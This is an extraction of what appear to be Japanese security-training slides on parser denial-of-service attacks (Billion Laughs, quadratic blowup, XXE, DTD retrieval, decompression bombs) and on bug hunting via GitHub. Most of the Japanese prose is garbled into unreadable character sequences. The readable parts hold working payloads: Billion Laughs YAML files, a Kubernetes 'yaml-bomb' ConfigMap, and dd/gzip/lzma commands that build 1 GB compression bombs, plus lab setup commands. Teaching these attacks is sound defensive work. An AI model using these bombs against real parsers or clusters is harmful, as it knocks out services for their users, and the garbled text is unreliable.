#JMMJPO-BVHIT :".-ύʔαʹ΋༗ޮ w #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧ lol1: &lol1 "lol" lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2] lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3] lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4] lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5] lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6] lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7] lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8] lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

Slide 124

Slide 124 text

#JMMJPO-BVHIT LTͰͷ࣮ྫ w ,VCFSOFUFT"1*αʔόʢLTJPLVCFSOFUFTQLHBQJTFSWFS ʣʹ ࡉ޻ͨ͠:".-ϑΝΠϧΛૹ৴͢Δͱ#JMMJPO-BVHIT͕ى͜Δ੬ऑੑ w $7& w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFT

Slide 125

Slide 125 text

#JMMJPO-BVHIT LTͰͷ࣮ྫ w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFTΑΓൈਮ apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default

Slide 126

Slide 126 text

2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ w #JMMJPO-BVHITʹࣅͨ2VBESBUJDCMPXVQ΋ಉ͘͡༗ޮ w :".-ύʔαͰͷ2VBESBUJDCMPXVQʹରͯ͠ݴٴ͍ͯ͠Δจݙ͸ ͳ͔ͥݟ͔ͭΒͳ͍🤔 w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ ͢Γൈ͚ΒΕΔʢ͸ͣʣ w ֤ϥΠϒϥϦͷରࡦͷࠩҟ·ͰௐࠪͰ͖ͯͳ͍͕ɺ 9.-ύʔαͱಉ͘͡#JMMJPO-BVHIT͸ແޮԽ͞Ε͍ͯΔ͚ΕͲɺ 2VBESBUJDCMPXVQ͕༗ޮͳϥΠϒϥϦ΋͋Γͦ͏ʢଟ෼ʣ

Slide 127

Slide 127 text

2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ w 2VBESBUJDCMPXVQΛࢼߦ͢Δ:".-ϑΝΠϧ w Πϯλʔωοτ্ʹ1P$͕ͳ͍ʢଟ෼ʣͷͰࣗ෼Ͱॻ͖·ͨ͠ʂ lol1: &lol1 “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)AAAAAAAAAAAAAAAA” lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,(লུ),*lol1]

Slide 128

Slide 128 text

ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ :".-ύʔαͰࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1Z:".-ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/yml-parser $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

Slide 129

Slide 129 text

ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w %FDPNQSFTTJPO#PNC ΠϚίί

Slide 130

Slide 130 text

&YUFSOBMFOUJUZFYQBOTJPO 99&ͷҰछ w Α͘஌ΒΕ͍ͯΔλΠϓͷ99& w ઌ΄Ͳղઆͨ͠΋ͷͱಉ༷ͳͷͰ͜͜Ͱ͸ղઆΛׂѪ

Slide 131

Slide 131 text

%5%3FUSJFWBM w ͜Ε΋99&ͷҰछ w υΩϡϝϯτλΠϓͷࢦఆΛϩʔΧϧύε΍63-Λ࢖ͬͯߦ͑ΔͨΊ ࢦఆ͞Εͨ৔ॴʹ͋Δ৘ใΛऔಘͰ͖Δ 99&ͷҰछ text

Slide 132

Slide 132 text

༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM &YUFSOBMFOUJUZFYQBOTJPO%5%3FUSJFWBM

Slide 133

Slide 133 text

&YUFSOBMFOUJUZFYQBOTJPOΛࢼ͢ ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ &YUFSOBMFOUJUZFYQBOTJPOΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/external-entity-expansion/ $ cd pulldom/python3.7.0 $ docker build . -t external-entity-expansion-pulldom $ docker run external-entity-expansion-pulldom

Slide 134

Slide 134 text

ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w %FDPNQSFTTJPO#PNC ΠϚίί

Slide 135

Slide 135 text

%FDPNQSFTTJPO#PNC ѹॖ͞ΕͨϑΝΠϧʹΑΔ%P4 w ల։͢ΔͱڊେͳαΠζʹͳΔѹॖ͞ΕͨϑΝΠϧΛૹΔ͜ͱͰɺ σΟεΫ༰ྔͷѹഭΛૂ͏߈ܸख๏ w ѹॖ͞Εͨ9.-ετϦʔϜΛղੳͰ͖Δ9.-ϥΠϒϥϦ͕ର৅ʹͳΔ w ೔ຊޠͰ͸ߴѹॖϑΝΠϧര஄ɺ;*1ര஄ͱݺ͹Ε͍ͯΔ $ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz # bs*count=1GB $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy # bs*count=1GB $ ls -sh zeros.* 1020K zeros.gz #શͯ0ͳͷͰѹॖ཰͕ߴ͍ 148K zeros.xy #શͯ0ͳͷͰѹॖ཰͕ߴ͍

Slide 136

Slide 136 text

༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM %FDPNQSFTTJPO#PNC

Slide 137

Slide 137 text

%FDPNQSFTTJPO#PNCʜ ԋशͳ͠ʜ w ҆શʹԋशΛ΍ͬͯ΋Β͏ͷ͕೉͍͠ͷͰ࢒೦ͳ͕Βԋश͸ͳ͍Ͱ͢ʜ

Slide 138

Slide 138 text

͜͜·Ͱͷ·ͱΊ w 9.-ʹ͸ଟछଟ༷ͳ߈ܸςΫ͕͋ΔͷͰɺઃఆϑΝΠϧʹ͸+40/ͳͲΛ ࢖͏ํ͕͍͍ w ٯʹ੬ऑੑΛ୳ཱ͢৔͔ΒݟΔͱ9.-ϑΝΠϧΛύʔε͢Δ෦෼͸ૂ͍໨ w 9.-ϥΠϒϥϦຖʹ༗ޮͳ੬ऑੑ͕ҧ͏ͷ͸1ZUIPOʹݶͬͨ͜ͱͰ͸ͳ͍ w ڵຯ͕͋Ε͹ଞͷݴޠͷ΋ͷ΋ௐ΂ͯΈ͍ͯͩ͘͞

Slide 139

Slide 139 text

ୈ̐ষ (JU)VCΛ࢖ͬͨόάϋϯτํ๏

Slide 140

Slide 140 text

ϥΠϒϥϦຖͷ੬ऑੑΛ஌ͬͨޙ͸ʜ (JU)VCΛ࢖ͬͨόάϋϯτํ๏ w ಛఆͷϥΠϒϥϦΛ࢖༻͍ͯ͠ΔίʔυΛ͍͔ʹ୳͔͢ w (JU)VCͷػೳΛ׆༻͢Δͱݟ͚ͭΒΕΔ w 5PQJDػೳ w ίʔυݕࡧػೳ w ίϛοτݕࡧػೳ w JTTVFݕࡧػೳ

Slide 141

Slide 141 text

Ұ෦ࣗओن੍😢

Slide 142

Slide 142 text

ԋश੬ऑੑ͕͋Δ044Λ୳͢ʢ͕࣌ؒ͋Ε͹ʣ w ࢒Γ͕࣌ؒ͋Ε͹΍ͬͯ΋Β͏ w ͳ͔ͬͨΒऴΘΔ

Slide 143

Slide 143 text

IUUQTPXBTQPSHXXXQEGBSDIJWF08"41/;9.-%BOHFSPVTQEG

Slide 144

Slide 144 text

࠶ܝ੬ऑੑΛൃݟͨ͠ޙ͸ใࠂʂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

Slide 145

Slide 145 text

஫ҙࣄ߲ w ଟ෼ɺ͋Δఔ౓ελʔ͕͍͍ͭͯΔ(JU)VCϦϙδτϦͰͳ͍ͱରԠͯ͠΋Β ͑ͳ͍

Slide 146

Slide 146 text

ୈ̑ষ ٕज़ͱ޲͖߹͏࢟੎ͷ࿩

Slide 147

Slide 147 text

੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w 9.-ύʔαʹؔ͢Δ੬ऑੑʹৄ͘͠ͳͬͨͷ͸"OESPJE.BOJGFTUYNMΛ ύʔε͢ΔίʔυΛॻ͍ͨͷ͕͖͔͚ͬ w ੩తղੳπʔϧʹࣗ෼͕ॻ͍ͨίʔυΛೖྗͨ͠Β੬ऑੑ͕͋ͬͨ w 1ZUIPOͷ9.-ϥΠϒϥϦ͸σϑΥϧτͰ੬ऑͰͦΕͧΕ༗ޮͳ੬ऑੑ͕ҟͳ Δ͜ͱΛ஌ͬͨ

Slide 148

Slide 148 text

੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ίʔυΛॻ࣌͘ʹࣗ෼͕ॻ͍ͨίʔυʹ੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱͰ ੬ऑੑΛͳ͘͠ɺηΩϡϦςΟͷ஌ࣝ΋਎ʹͭ͘ w ։ൃͷܦݧΛੵΈͳ͕ΒɺηΩϡϦςΟͷ஌ݟ΋ߴΊΒΕΔ w ͦͯ͠ಘͨ஌ࣝͰόάϋϯτ͢Δͱ$7&ΛऔಘͰ͖ͨΓɺใ঑ۚΛ໯ͬͨΓ Ͱ͖Δ͔΋ʜʂʂʂ

Slide 149

Slide 149 text

੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ηΩϡϦςΟɾΩϟϯϓʹࢀՃ͔ͨ͠Βͱ͍ͬͯશһ͕ηΩϡϦςΟͷಓʹ ਐΉ༁Ͱ͸ͳͯ͘։ൃଆͷಓΛาΜͰ͍͘ਓ΋͍Δ w ηΩϡϦςΟͷ஌ࣝ͸ηΩϡϦςΟΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋ ։ൃଆͷΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋໾ཱͭ w ࠓޙηΩϡϦςΟɾΩϟϯϓͰֶΜͩ஌ࣝͷ͏ͪԿ͔͕໾ཱͯͯ͘ΕΔͱ ͏Ε͍͠Ͱ͢